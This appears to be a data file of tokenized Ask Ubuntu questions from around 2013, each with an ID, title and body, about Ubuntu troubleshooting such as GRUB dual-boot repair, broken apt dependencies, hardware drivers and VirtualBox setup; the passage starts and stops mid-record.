' . nx > 716 nx agent exited with status : 1 nx > 1001 bye . okay ... : $ sudo rm /tmp/.x0-lock [ sudo ] password for reg : reg @ desktopoffice : ~ $ ssh -x localhost ; /usr/lib/nx/nxnode -- agent reg @ localhost 's password : welcome to ubuntu 12.04.3 lts ( gnu/linux 3.2.0-51-generic x86_64 ) * documentation : https : //help.ubuntu.com/ last login : wed sep 18 11:10:30 2013 from localhost reg @ desktopoffice : ~ $ exit logout connection to localhost closed . nx > 1000 nxnode - version 3.2.0-74-svn os ( gpl , using backend : 3.5.0 ) nx > 716 starting nx agent ... _xservtranssocketunixcreatelistener : ... socketcreatelistener ( ) failed _xservtransmakeallcotsserverlisteners : server already running error : aborting session with ' can not establish any listening sockets - make sure an x server is n't already running ' . session : aborting session at 'wed sep 18 11:14:27 2013 ' . session : session aborted at 'wed sep 18 11:14:27 2013 ' . nx > 716 nx agent exited with status : 1 nx > 1001 bye . $ how can i fix this to get it working ?
347196	empathy and pidgin fail chatting `` people nearby ''	i ca n't use either empathy or pidgin to reply to some users using the `` people nearby '' / people near me / bonjour / avahi protocol . i can receive messages from them , it will arrive on my machine , but when i send a reply i receive an error sending message `` [ message ] '' : disconnected error . if they send me more messages i get those as well . this happens only to some users on the local network , with other local users i can chat just fine . error on empathy : the same issue on pidgin :
347198	boot menu missing after installing ubuntu 13.04	i have an hp pavillion g-6 laptop with windows 8 installed . i installed the ubuntu 13.04 with usb and now the boot menu does not appear . but if i go to the bios i can find the ubuntu option and can load it from there . any help will be much appreciated .
347200	key presses not registering unless i type very slowly	asus k55n laptop ubuntu 13.04 kernel : 3.8.0-30-generic it took a long while to type this . i purged and reinstalled apport yesterday because it had been crashing . i am not sure if that 's related but the problem seemed to begin after i did that . basically , i have to hold down each key for approximately 0.5 seconds in order to ensure the input is actually registered . as i 'll be starting college in 10 days , this is a disastrously annoying thing to have happen . i 'm not sure what system info or logs would contribute to finding a solution .
347202	ubuntu 13.04 : keyboard and trackpad do not work on samsung ativ smart pc pro	i created a bootable usb drive with ubuntu 13.04 image . i managed to boot my samsung ativ . the gui , mouse and keyboard work perfectly , and the installation works without problems . when i boot the system for the first time , however , once the gui of ubuntu loads , neither the keyboard nor the trackpad work . the system is therefore rendered useless . the keyboard works ok in grub . any pointers on how to troubleshoot this problem ?
347203	what exactly is grub ?	can anyone explain me with fairly simple words and not too technical concepts what exactly is grub , what is its primary usage and how to use it efficiently for a dual boot windows/ubuntu installation ? i have already read a couple of resources but i am still confused .
347205	any version of ubuntu does not boot at all . like if it did not exist	i have tried to install few versions of ubuntu , including 12.04 lts . i have another operating system on a separate hdd . i make my pc load the clean hdd first , then i install ubuntu to it and reboot my computer , removing the installation usb . and then ... it just loads as usual . like if ubuntu was not here . i have tried to even clear everything from my computer and install ubuntu onto a fully empty machine with no information at all , nor data nor operating systems . then my pc does not load anything and just keeps showing a blinking _ symbol . what is happening and what to do ? my computer consists of an asus uefi motherboard with 4gb of ram inserted into it , amd phenom ii processor with four cores , an asus geforce gtx 650 graphics card and a 320gb hard drive . i noticed that only this particular hard drive shows 1mb of free space before and after any partitions created for ubuntu , and only this particular hard drive does not work with ubuntu at all . other drives do not show any free space but the space of partitions i allocate there and work with no errors . but i want to use this hard drive .
347206	ubuntu apache2 wo n't start	* starting web server apache2 apache2 : syntax error on line 214 of /etc/apache2/apache2.conf : syntax error on line 3 of /etc/apache2/httpd.conf : expected < / > but saw < /directory > action 'start ' failed . the apache error log may have more information . ... fail !
347210	`` dmr_kms-helper panic occurred switching back to text console” error	this is my first time installing ubuntu and i 've hit a bit of a brick wall . i 'm attempting to install ubuntu 13.04 64 bit edition . i put the disc into my blank hard drive , wait about 20 minutes as it stays on the initial screen ( 5 circles changing from orange to white with 'ubuntu ' above ) and then get a black screen with the following information `` dmr_kms-helper panic occurred switching back to text console” . any thoughts on what the issue may be would be most useful . specifications are below motherboard : gigabyte 78lmt usb 3.0 motherboard technology cpu : amd bulldozer fx 8350 4.0ghz 16mb cache hard drive : 1tb sata hard drive memory : 8gb ddr3 1600mhz memory graphics card : ati radeon 5450 1gb graphic card with hdmi
347211	ultra 100 bios is not installed because there are no drivers attached	i just reinstall ( do n't ask me why ) ubuntu 12.04 32bits server on a old server that we have here . the first time , no problem . i did install boot on the system and everything was working fine . last week , someone launch another install and since then the server does n't boot anymore . before i post this , i searched an answer but nothing seemed to work . when the server start , i have long delay , then ultra 100 bios is not installed because there are no drivers attached message for 1 second and nothing else happen . i did reinstall from scratch and nothing seems to work . thanks for helping me .
347223	sed substitute through a sentence on multiple lines	i am new to using sed but i have been experimenting sed 's s/ ... ./ ... ./ ( substitute ) to modify a full sentence if it 's on one line but i am unaware an alternative solution on how to modify a sentence that may have been separated on two lines such as : this : lorem ipsum is simply dummy text of the printing and typesetting industry . is actually written as this : lorem ipsum is simply dummy text of the printing and typesetting industry . how can you detect for this or code it to replace the entire sentence even if it 's on two lines instead of one ?
347227	why wo n't banshee sync certain songs to my ipod properly ?	i am a bit new to ubuntu but when i try to synchronize my 3rd generation ipod nano with my banshee library and then listen to them from the ipod it shows the songs info and stuff but then no song plays , it either skips to the next song or the whole thing freezes ( which is annoying ) . it used to work , but then decided to start being stupid just recently . is this something i can fix ?
347230	trying to download ubuntu 13.04 64bit	i have twice tried to download the 64 bit version of ubuntu 13.04 ( from the official site ) and each time i have checked it after the install it has been the 32 bit variety . i could understand this if i was running 32 bit architecture but i have an amd 64 processor . any suggestions would be welcome , probably !
347233	how do i boot from usb ?	i installed ubuntu 13.10 saucy unto a usb stick using pen drive linux 's usb installer . it wo n't boot . booting to a usb is n't in the bios boot order . my desktop computer is essentially a brand new i7-3770 . why wo n't it boot from usb ? thanks . mark .
347236	why some function definitions appears in italic font in qt creator ?	i am using qt creator to work on open source and i am not able to understand some functions name are in italic fonts while declared it in it 's class , whereas all other function are in normal font in all other class while declaring . can you please explain how this functions are different from other ?
347237	why does the ubuntu website recommend a software cd burner program that installs unwanted extras ?	it took an hour to uninstall all the extras installed by the recommended cd burner program - infrarecorder . http : //www.ubuntu.com/download/desktop/burn-a-dvd-on-windows see the section entitled `` windows 95 / 98 / me / 2000 / xp / server 2003 / vista7 '' i still might have to restore my computers hard drive . infrarecorder installed numerous unwanted programs and changed all kinds of settings in chrome and how many other places that i have n't found yet ? ? so why does ubuntu recommend this cd burner that installs unwanted extras ?
347239	smokeping installed and working , but graphs unreadable	i have a client with some issues in the network and i installed smokeping to monitor latency . after installing and configuring it 's ok , but the graphs are completely unreadable . thanks for any help on this .
347240	automatically kill chrome processes that exceed ram limits	i 've sought advice from similar threads here , and i 'm either not reading them correctly , or my brain is currently fried . my prior reading : automatically kill a process if it exceeds a given amount of ram and all of its clickthroughs either way , here 's my problem : when running tumblr dashboard for significant lengths of time ( yes , i have an addiction ) , the chrome tab in which it is running will consume ever-increasing amounts of ram - topping out at 2.9 gib , which is when my computer starts slowing noticeably , and i catch it and manually kill the process . killing the process does the trick , as it only takes the specific chrome tab with it ( with no loss of data ) , and leaves the rest of the browser intact . ( thank god for isolated processes ) is there a way to set up ulimit or something else , so that it will only kill individual processes identifying as `` chrome '' , when they reach a limit of ( say ) 1500 mib ram usage .
347246	how to mantain an ubuntu server without the `` -updates '' release	in short : does any one out there , running ubuntu servers , tries to do it with the `` -updates '' release ( like precise-updates ) disabled ? if so , how do you deal with ubuntu point releases ( that include packages from -updates ) ? this is way specific , and i did n't find anything about it in my searches . please point me out to any previous question or maybe to a more appropriate forum you know for this . not so short : it seems to me that the whole point in having -updates as a separate release is opting to not using it , and having just the security-related updates installed . that 's what we try to do in our company . of course , you might need some package from -updates , and we do . so we leave the -updates on sources.list , but pin it to -10 ( `` do n't use at all '' priority ) . specific packages we need from -updates are then pinned with a higher priority so they get selected . we have that setup automated already . it works well ... most of the time . problem arises if someone uses an image/cd of an ubuntu 's point release ( say 12.04.2 , for example ) to install a new machine . point releases do include the -updates packages up to that time . when i try to install some new package ( after disabling/pinning -updates ) and that package depends on one of those -updates packages that came with the point release , i might get a broken package . like in this case : # apt-get install vim-nox -s reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : vim-nox : depends : vim-common ( = 2:7.3.429-2ubuntu2 ) but 2:7.3.429-2ubuntu2.1 is to be installed depends : vim-runtime ( = 2:7.3.429-2ubuntu2 ) but 2:7.3.429-2ubuntu2.1 is to be installed e : unable to correct problems , you have held broken packages . it 's trying to install vim-nox from `` precise '' , but vim-common and vim-runtime from precise-updates are already installed ( by the base install , before i can change anything ) , and so it breaks . fiddling with the apt_preference priorities did n't help me . afaict dependencies do n't affect apt 's priority/selection algorithm , so it wo n't do the job . of course i can just ban the use of point release images , but that 's kind of unfortunate . in a world of increasingly prebuilt images for every kind of virtualization platform , if i want to take advantage of them ( even if only for testing ) , i have to search for old , sometimes deprecated ( or non-existant ) images made before the first point release . does anybody here has been through this ?
347247	move metacity window buttons in an upward ( negative ) direction	in my metacity window theme for ubuntu 12.04 , i am trying to customise the close , minimize , and maximize buttons . i have the .png images in the folder already put on the window , but can not move them closer to the top of the window . to explain this better , it seems ubuntu unity has a default setting to the location of the buttons , and they are set on their own position on the window bar when defined at coordinates ( 0,0 ) . if i attempt to rise it upward in the theme 's .xml file , by going into negative numbers as assumed through a coordinate system , then refresh it , it crashes . clearly it can not handle negative numbers . i have been searching forums and google for a while and can not find an answer . does anyone know another way to accomplish this ?
347249	what music programs will sync my mp3 player , sony walkman s ?	i am looking for a good music player for ubuntu 12.04 lts 32-bit that will sync metadata and my playlists to a sony walkman s series mp3 player . so far i have tried banshee , rythmbox , and clementine , no one will sync anything . update 9/18 7:32 pm est : i hav trid play on linux with windows media player 10 ( crashed ) and amarok ( sync 3 songs and quit on me .
347250	guake does not start automatically	how can i make guake start on boot ? guake is installed and works fine via manual startup ( typing guake in a terminal works e.g ) . when i press super and type `` startup applications '' guake is there , using the command `` guake '' ( simple one should think . but no ) . it does n't work . i can not open guake via the keyboard shortcut and top in terminal does not show anything that says `` guake '' , that is until i open it manually . i have also tried sudo cp /usr/share/applications/guake.desktop /etc/xdg/autostart/ but with no result . any ideas ? i am using gnome ubuntu 13.04 , but do n't think it is related to my specific system since i have encountered the problem on my previous systems ( also ubuntu based however ) , but have n't bothered researching it till now .
347253	porting ubuntu touch to beaglebone black	i have been trying to find a tutorial to help me port ubuntu touch to beaglebone black ( bbb ) as my final term project . i know that there is no cm 10.1 image for the bbb board , but i found some tutorial how to build the kernel ( 3.8 ) with the required kernel patches . is there a place i can get more help ? ( not # ubuntu-touch irc , they never reply ) thanks in advance
347254	music application that reads existing ratings from id3 tags	banshee for some odd reason is not reading my existing id3 tags from my windows music library . this is really odd because i have been using banshee for many years now based on the purpose of being able to read my tags . i noticed that in this new version the options menu has changed . does anyone know of an alternative app that can read rating tags natively on ubuntu ? i am down to try anything i just hope for the love of god my tags have n't been erased . i have over 12k pieces of music : ( thanks .
347258	asus n56vb backlit keyboard	i recently bought an asus n56vb , which is supposed to ship with a backlit keyboard . however , on startup and when it 's dark there is backlit keyboard . when pressing the fn+f3 or fn+f4 button combinations , the animation for increasing/decreasing the brightness of the keyboard does not appear . the buttons f3 and f4 have a picture of a keyboard and a light and are supposed to set the light . how do i fix this problem ?
347263	how can i make this pci work ?	00:1b.0 audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 01 ) my sound is dead , under ubuntu 13.04 , on dell e1705 laptop . worked the first time i installed it , but this time ... no sound and it says i 'm using `` dummy output '' . ? ? ?
347264	cd/dvd discs will not play	i 've been trying to copy pictures from a cd and they will not come up . i 've tried audio cds as well , with no luck . any ideas ? *-cdrom description : dvd-ram writer product : dvd rw ad-7173a vendor : optiarc physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/cdrom logical name : /dev/cdrw logical name : /dev/dvd logical name : /dev/dvdrw logical name : /dev/sr0 version : 1-03 serial : [ capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=ready *-medium physical id : 0 logical name : /dev/cdrom
347268	how to move between 2 very different directories in the terminal ?	when i move files with a gui file manager , i navigate to the source and destination directory in 2 different windows , and then drag and drop . is there a way to do this in bash ( move a file to a directory , but be able to navigate to the new directory rather than needing to know the full path right away to put in the argument ) i know how to use commands like mv , and cp , but both of these take one full path as the argument , and i want to be able to navigate to the new destination separate from navigating to the source file ... if that makes sense
347270	windows 8 wo n't boot even after running boot-repair , some one please help	i installed ubuntu 13.04 using the install alongside windows option but when i decided to reboot back to windows it gave me a error message , ' can not find command drive map ' i have tried the boot-repair method but when i try and boot again it says that windows had encountered a problem and restarts but will not boot whatsoever . help would be appreciated , thanks
347272	./configure permission denied when try to build llvm	i 'm try to build to build clang and llvm and after download it i want to configure it so when i do that command : ../llvm/configure -- prefix=/usr/clang_3_3 -- enable-optimized -- enable-targets=host it 's show me error configure permission denied even when i 'm root and i try chmod +x it did n't work any help note : i download clang and llvm from svn and i put it to anthor dir ( not the root ) in /media one of these dirs
347275	virtual box setup error	i downloaded virtual box and installed it . i followed instructions on how to set it up but when i went to run it i got the following errors on the right side of the image below & downarrow ; i tried the sudo apt-get install virtualbox-qt advise from here : & rightarrow ; there is an error when i try to install virtual box into ubuntu and got the following read out : reading package lists ... done building dependency tree reading state information ... done virtualbox-qt is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . i also tried the : /etc/init.d/vboxdrv setup advise in the top error report and got this read out : `` bash : /etc/init.d/vboxdrv : no such file or directory '' can someone instruct me on what i should do to fix this problem ? `` edit '' & downarrow ; after a complete new install of ubuntu 12.04 this morning , i followed nikth 's advise and downloaded oracleâs virtual box v-4.2 from the link he provided . set it up and tried to run it . i did not have an iso ( lost in the computer crash last night ) so i booted it from cd/dvd drive , with the same live cd i used to re-install this morning ... this is the problem i have now , ( above the cursor ) . & downarrow ; can someone please explain why ubuntu 12.04 will run on my laptop but not on my virtual machine ? am i missing some settings somewhere ? `` update '' i finally got ubuntu 13.04 32 bit , to run in my virtual machine , so it is working properly ... my final question is this - if ubuntu 12.04 64 bit version runs on my laptop how come it does not run in my vm ? thank you , `` nikth '' & `` terry wang '' for your patience and all your help ...
347278	boot mac partition as a virtual machine ?	i was wondering if it was possible to use my mac partition inside ubuntu by running it as a virtual machine ? i still use mac for work because of compatibility issues . i find myself constantly restarting my computer and switching partitions , just because some program does n't have linux support . running both partitions at once would be an ideal solution , but i 've been browsing the web , and did n't find anything useful ( i found this blog post , but the syntax does n't recognize the keyword -register without which i can not proceed ) . i have disabled journaling on the mac partition which grants me access to read and write files on the mac partition , using ubuntu . in the nautilus sidebar i see that partition labelled as 'macintosh hd ' . i am able to see and modify the whole system file structure , but can i somehow boot into it as a virtual machine ? thanks in advance !
347280	ubuntu 12.04 and openssh-server	i have a problem installing openssh server and client on ubuntu 12.04 desktop . i want to make a home server , but i am a windows user and i need a graphic interface . first of all , i used the command sudo apt-get update and i updated all . when i typed : sudo apt-get openssh-server i got this : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : openssh-server : depends : openssh-client ( = 1:5.9p1-5ubuntu1 ) but 1:5.9p1-5ubuntu1.1 is to be installed recommends : ssh-import-id but it is not going to be installed e : unable to correct problems , you have held broken packages . i am a newb in linux , and i googled the error or problem but no answer : / can anybody help ?
347283	ubuntu server 13.04 install failure	i 'm trying to install ubuntu server 13.04 from a usb drive onto an old dell pc . i 've installed from usb before on that system , so i know usb install should work . the installer stops when it tries to mount the cd . i looked through the installer messages and realized that it was mounting my hard drive as the cd , then failing because it contained no installer files . i tried mounting sdb1 ( the usb key ) manually with mount , but then the installer fails to install the kernel package `` linux-generic '' . any idea what i should do ? should i unmount the installation drive when prompted by the installer ? or something else ?
347288	ubuntu wifi connection problems	i use ubuntu 13.04 version and established a strong connection to my wifi router just fine , but it wo n't connect to the internet , i 'm using the built in mozilla firefox browser . what.seems to be the problem ?
347289	how to eliminate removed ubuntu distros from grub menu	i had ubuntu 12.04 , 12.10 , and 13.04 installed . the grub menu was very cluttered for the 12.10 and 13.04 distro 's . used the disk utility within 12.04 to delete both 12,10 and 13.04 . ran sudo update-grub . shut down 12.04 and rebooted . the grub menu had n't changed a bit . it still showed 3 ubuntu versions . what did i do wrong ?
347290	nike+ fuelband on 64-bit ubuntu	i was recently gifted a nike fuelband . to set it up and sync it , one must plug it into a computer running windows or mac . this is a little strange to me , as it supports bluetooth , but that 's another issue . i was hoping to sync with a windows guest os in virtualbox but virtualbox is n't detecting any usb devices when i plug it in . dmesg tells me : [ 3987.909749 ] usb 1-1.2 : new full-speed usb device number 5 using ehci-pci [ 3988.021262 ] usb 1-1.2 : new usb device found , idvendor=11ac , idproduct=6565 [ 3988.021265 ] usb 1-1.2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 3988.021266 ] usb 1-1.2 : product : fuelband [ 3988.021268 ] usb 1-1.2 : manufacturer : nike [ 3988.021269 ] usb 1-1.2 : serialnumber : 00000001 [ 3988.026783 ] hid-generic 0003:11ac:6565.0005 : hiddev0 , hidraw0 : usb hid v1.10 device [ nike fuelband ] on usb-0000:00:1a.0-1.2/input0 most of the posts found googling this issue were outdated or inconclusive . something suggested that 64-bit ubuntu ca n't see fuelbands for some reason . any troubleshooting ideas ?
347292	virtual screen larger than 4096x4096 using xrandr	i have a triple monitor setup with a 1920x1200 monitor in the middle and two rotated 1600x1200s on the sides , for a total requirement of 4320x1600 . i recently installed xubuntu and i 'm trying to use xrandr to set this up , and ca n't figure out how to do it . i always get an error as follows , whatever i try ( root , using 1:1 resolutions and creating an xorg.conf file and putting a virtual line in it all do n't work ) . x @ x : ~ $ xrandr -- fb 4320x1600 xrandr : screen can not be larger than 4096x4096 ( desired size 4320x1600 ) if it matters i 'm using two geforce 7300 gs with two monitors on dvi and one on vga . all three monitors show up and i can enable any combination of two at once just fine . thanks for the help !
347294	how do i mark a .jar file as executable on xubuntu 13.04 ?	i 'm trying to get the minecraft.jar file to execute , but the check box wo n't come up when i go to properties > permissions . i do n't know much about the terminal and its commands so if someone could post a simple step by step solution on how to mark it that would be great . people keep saying to use a chmod command but i have no idea what that is , so you are forewarned if i say `` over my head '' .
347298	initializing a build environment installing required packages ( ubuntu 10.04 -- 11.10 )	i am trying to initialize a android build environment on ubuntu 10.04.4 . i have followed the instructions provided by google and have run into a issue at the following step under `` installing required packages ( ubuntu 10.04 -- 11.10 ) . '' i run the following commands provided by google : sudo apt-get install git-core gnupg flex bison gperf build-essential \ > zip curl zlib1g-dev libc6-dev lib32ncurses5-dev ia32-libs \ > x11proto-core-dev libx11-dev lib32readline5-dev lib32z-dev \ > libgl1-mesa-dev g++-multilib mingw32 tofrodos python-markdown \ > libxml2-utils xsltproc when i attempt to run this section of the setup process i receive the following error : $ sudo apt-get install git-core gnupg flex bison gperf build-essential \ > zip curl zlib1g-dev libc6-dev lib32ncurses5-dev ia32-libs \ > x11proto-core-dev libx11-dev lib32readline5-dev lib32z-dev \ > libgl1-mesa-dev g++-multilib mingw32 tofrodos python-markdown \ > libxml2-utils xsltproc reading package lists ... done building dependency tree reading state information ... done git-core is already the newest version . gnupg is already the newest version . flex is already the newest version . bison is already the newest version . gperf is already the newest version . build-essential is already the newest version . zip is already the newest version . curl is already the newest version . zlib1g-dev is already the newest version . libc6-dev is already the newest version . lib32ncurses5-dev is already the newest version . ia32-libs is already the newest version . x11proto-core-dev is already the newest version . libx11-dev is already the newest version . lib32readline5-dev is already the newest version . note , selecting lib32z1-dev instead of lib32z-dev lib32z1-dev is already the newest version . libxml2-utils is already the newest version . xsltproc is already the newest version . some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libgl1-mesa-dev : depends : libgl1-mesa-glx ( = 7.7.1-1ubuntu2 ) but 7.7.1-1ubuntu3 is to be installed e : broken packages i 'm new to this , so i would appreciate any help on what is causing the problem and how to fix this . thank you .
347304	ubuntu reinstall on pc with ubuntu + windows ; no option to replace ubuntu	i have windows and ubuntu 12.04 ( not working ) on my computer and i decided to reinstall ubuntu . after i booted into the live usb i do n't see the option of replacing the installed ubuntu with the new one i 'm about to install . i can only choose between replacing windows or managing partitions myself . some people on the ubuntu forums and ask ubuntu ( on existing threads & questions ) say that this may be caused because windows is taking up all partitions and i need to manage all those partitions myself . however , i 'm not really happy to manage partitions myself , since i have grub on my pc , and deleting it would be a serious problem . actually , before this install with only two options , i tried another install , however , during that time there were three options and one of them was to replace ubuntu with the about-to-install one . however , i decided to quit during installation at the point where the three options showed up , but pressing the quit button just does n't work and my cursor was a spinning wheel ( which tells me to wait ) . i got impatient after one or two minutes and powered off my pc by pressing the power button directly . after that , no option of replacing ubuntu showed up during this second install . what should i do ?
347305	can not connect logitech usb audio adapter	i have a logitech usb audio adapter , and i would like to use it with my lubuntu system . however , whenever i try to select my usb adapter in alsamixer , the settings revert to the default whenever i close alsamixer . what can i do ?
347306	dual boot not work grub no access to win easy bcd no access to ubuntu	i have trouble with dual boot . pleas help me . problem looks like this : first , soon after instalation of ubuntu i have dead system – grub rescue , i get rid of grubrescue with boot-repair + ata suport checked , recomended repair does nothig . then i can acces to grub boot options , but not working for win boot - a disk read error occured . after applying grub repair with different settings i have always same result . it looks like if i aply grub repair , then grub make windows boot sequence dead ; owerwriten , and ntfs partitions unrecognizable . i have grub menu with options , but it came out after tvice repeated message error : no device connected . if i use grub-repair to repair mbr then mbr make linux boot sequence dead ; owerwriten , and linux partitions unrecognizable . windows start imediatley , no screen with boot options . so i can made my sistem boot into win or ubuntu via live session and boot repair fo mbr or grub . in win i put easybcd , but i have analog problem with bootig ubuntu , i have boot options screen but ubuntu does not work . watch some details about tvice repeated error : no device connected , and analog mesage when booting ubuntu from easybcd . i have made three instalations of ubuntu . in first i had tried to make separated boot partition inside 100g , and put grub ino it – with no result . in second instalation i put both os inside first 100g of hdd and made separate grub partition– agan no result . in third i deleted separate grub partition , cause both os inside first 100g of hdd . my forum search resulted in steps like : put grub here or there ie sda , sdax , or in separated partition sday . find location of grub files and point sistem on them . do it using terminal or grub-repair for me this does not work . i have worikng grub witch is unusable to boot win , or i have working win wih no grub adderd easybcd in win had no way to boot ubuntu . in boot info scripts i have rpeatedly thinghs , by my opiniom ugly , that shoud not be there : like hexdump tables of sda1,2=win7 on the end saying ... tfght is missing ... tfght is compr essed ... press ct rl+alt+del to restart… and disk read error occurred bootmgr is missing bootmgr is compr essed ... press ct rl+alt+del to re start . i connect this two vith mentioned »welcome« in the begining of boot from grub and twice repeated : no device connected . and : 346 unknown bootloader on sda3 -- - this is extended partitin table , red strings from 355 – 00000070 to 366 – 00000120 xxxpaste.ubuntu.com/6124520 i connect this with failed win load temptation resulted in a disk read error occured . so if i fix grub and start win i have two errors error : no device connected error : no device connected and if i fix mbr , than from easybcd start ubuntu i have two erros too : fatal ! inconsistent data read from ( 0x80 ) 314311665+127 ( =314311792 ) fatal ! inconsistent data read from ( 0x80 ) 314311725+1 maybee it is matter of the same thing , cause of sumilar behavior . about instalation of ubuntu : i have more versions of 12.04 : 701,2mb , checked cd with option before instalig , but no isomd5 check , cause i cant find it , cause now is out newer version 707mb , i checked md5 , and checked burned dvd . for 701,2mb md5 is d791352694374f1c478779f7f4447a3f , but i dont find md5 original any more . this is important cause i cant use 707mb cuse it freeze after gray screen , start to blink , no vay to live session . 701mb i can use with trick that i go first in live session , disable ubiquity slide show and after i go to install . im tentated to try linux mint , but it is ubunto based , instalation goes wih same mechanics , so… ? my sistem is : win7 + ubuntu 12.04 note book : asus l3d ( l3000d ) 2000+ mobile athlon xp processor 32bit advanced sis® 650+961 chipset sis® 650 integrated graphics ubuntu info : vesa : 6325 1gb ddr sdram standard 250gb hdd bios : ( l3d latest bios 0115 ) - 0115a matjaz @ matjaz-l3d : ~ $ lspci 00:00.0 host bridge : silicon integrated systems [ sis ] 740 host ( rev 01 ) 00:01.0 pci bridge : silicon integrated systems [ sis ] agp port ( virtual pci-to-pci bridge ) 00:02.0 isa bridge : silicon integrated systems [ sis ] sis962 [ mutiol media io ] lpc controller ( rev 04 ) 00:02.1 smbus : silicon integrated systems [ sis ] sis961/2/3 smbus controller 00:02.5 ide interface : silicon integrated systems [ sis ] 5513 ide controller 00:02.6 modem : silicon integrated systems [ sis ] ac'97 modem controller ( rev a0 ) 00:02.7 multimedia audio controller : silicon integrated systems [ sis ] sis7012 ac'97 sound controller ( rev a0 ) 00:03.0 usb controller : silicon integrated systems [ sis ] usb 1.1 controller ( rev 0f ) 00:03.1 usb controller : silicon integrated systems [ sis ] usb 1.1 controller ( rev 0f ) 00:03.2 usb controller : silicon integrated systems [ sis ] usb 1.1 controller ( rev 0f ) 00:03.3 usb controller : silicon integrated systems [ sis ] usb 2.0 controller 00:04.0 ethernet controller : silicon integrated systems [ sis ] sis900 pci fast ethernet ( rev 90 ) 00:0a.0 cardbus bridge : ricoh co ltd rl5c476 ii ( rev aa ) 00:0a.1 cardbus bridge : ricoh co ltd rl5c476 ii ( rev aa ) 00:0a.2 firewire ( ieee 1394 ) : ricoh co ltd r5c552 ieee 1394 controller ( rev 02 ) 01:00.0 vga compatible controller : silicon integrated systems [ sis ] 65x/m650/740 pci/agp vga display adapter i documented all steps i had done like folows : in the beginig i have only w7 os . instaled ubuntu : boot-repair default xxxpaste.ubuntu.com/6077013/ not working : by ubuntu instalation i chosed automatic , and i moved slider betven tvo parts of disk , this situatition is result : warning : extended partition does not start at a cylinder boundary . dos and linux will interpret the contents diferently . boot-repair + out of disk xxxpaste.ubuntu.com/6077014/ situation 1 error : no device connected error : no device connected grub boot loader ok , ubuntu ok win 7 not start : a disk read error occured press ctrl+alt+del to restart boot-repair restore mbr : xxxpaste.ubuntu.com/6079515/ situation 2 win 7 start directly , no grub , no dual boot boot-repair reinstal grub + place on sda xxxpaste.ubuntu.com/6080320 not working : …error no such partition grub rescue > boot-repair default xxxpaste.ubuntu.com/6080431 …error no such partition grub rescue > boot-repair + out of disk xxxpaste.ubuntu.com/6080874 got situation 1 terminal-boot-repair know you root partition sudo su fdisk –l device boot start end blocks id system /dev/sda1 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 * 206848 314311619 157052386 7 hpfs/ntfs/exfat /dev/sda3 314312702 488396799 87042049 5 extended /dev/sda5 314312704 486430719 86059008 83 linux /dev/sda6 486432768 488396799 982016 82 linux swap / solaris mount the root partition sudo mkdir /mnt/temp sudo mount /dev/sda5 /mnt/temp be the chroot for i in /dev /dev/pts /proc /sys ; do sudo mount -b $ i /mnt/temp $ i ; done sudo cp /etc/resolv.conf /mnt/temp/etc/resolv.conf sudo chroot /mnt/temp root @ ubuntu : / # _ purge grub 2 packages apt-get update apt-get purge grub grub-pc grub-common re-install grub packages choose the option in the format of sdx sda . do not select the drive partition in 4 letter format apt-get install grub-common grub-pc update the grub and exit the chroot : update-grub exit unmount the partition : for i in /dev/pts /dev /proc /sys ; do sudo umount /mnt/temp $ i ; done before xxxpaste.ubuntu.com/6084399 now xxxpaste.ubuntu.com/6084820 317 unknown bootloader on sda3 restart and : error : no such partition . grub rescue > _ grub rescue > ls ( hd0 ) ( hd0 , msdos2 ) ( hd0 , msdos1 ) ( fd0 ) grub rescue > _ separated boot partition : after win moved : xxxpaste.ubuntu.com/6105871 358 warning : extended partition does not start at a cylinder boundary . dos and linux will interpret the contents differently . gparted , align with cylinder aligned – no warning xxxpaste.ubuntu.com/6106666 =================== parted -l : model : ata wdc wd2500beve-0 ( scsi ) disk /dev/sda : 250gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 4 32.3kb 1053mb 1053mb primary ext4 1 1053mb 1160mb 107mb primary ntfs 2 1160mb 160gb 159gb primary ntfs boot 3 161gb 250gb 89.1gb extended 5 161gb 249gb 88.1gb logical ext4 6 249gb 250gb 1006mb logical linux-swap ( v1 ) boot-repair + out of disk + place grub on sda4 xxxpaste.ubuntu.com/6106945 situation 1 , again easy bcd : does not start ubuntu easy bcd +neo grub manual entry : from repot i have : menuentry 'ubuntu , with linux 3.2.0-53-generic-pae ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root 93b106ab-6fd5-4fd3-bddd-241adfb663c1 linux /boot/vmlinuz-3.2.0-53-generic-pae root=uuid=93b106ab-6fd5-4fd3-bddd- 241adfb663c1 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.2.0-53-generic-pae =================== parted -l : model : ata wdc wd2500beve-0 ( scsi ) disk /dev/sda : 250gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 4 32.3kb 1053mb 1053mb primary ext4 1 1053mb 1160mb 107mb primary ntfs boot 2 1160mb 160gb 159gb primary ntfs 3 161gb 250gb 89.1gb extended **5** 161gb 249gb 88.1gb logical ext4 6 249gb 250gb 1006mb logical linux-swap ( v1 ) manual entry in neo grub : timer=10 title ubuntu find -- set-root /boot/ vmlinuz-3.2.0-53-generic-pae kernel /boot/ vmlinuz-3.2.0-53-generic-pae ro root=/dev/sda5 initrd /boot/ initrd.img-3.2.0-53-generic-pae after restart got bcd menu , select ubuntu… : booting ubuntu long time nothing hapens… *fatal ! inconsistent data read from ( 0x80 ) 314311665+127* long time nothing hapens… *fatal ! inconsistent data read from ( 0x80 ) 314311725+1* soon ater hdd start to be abnormaly 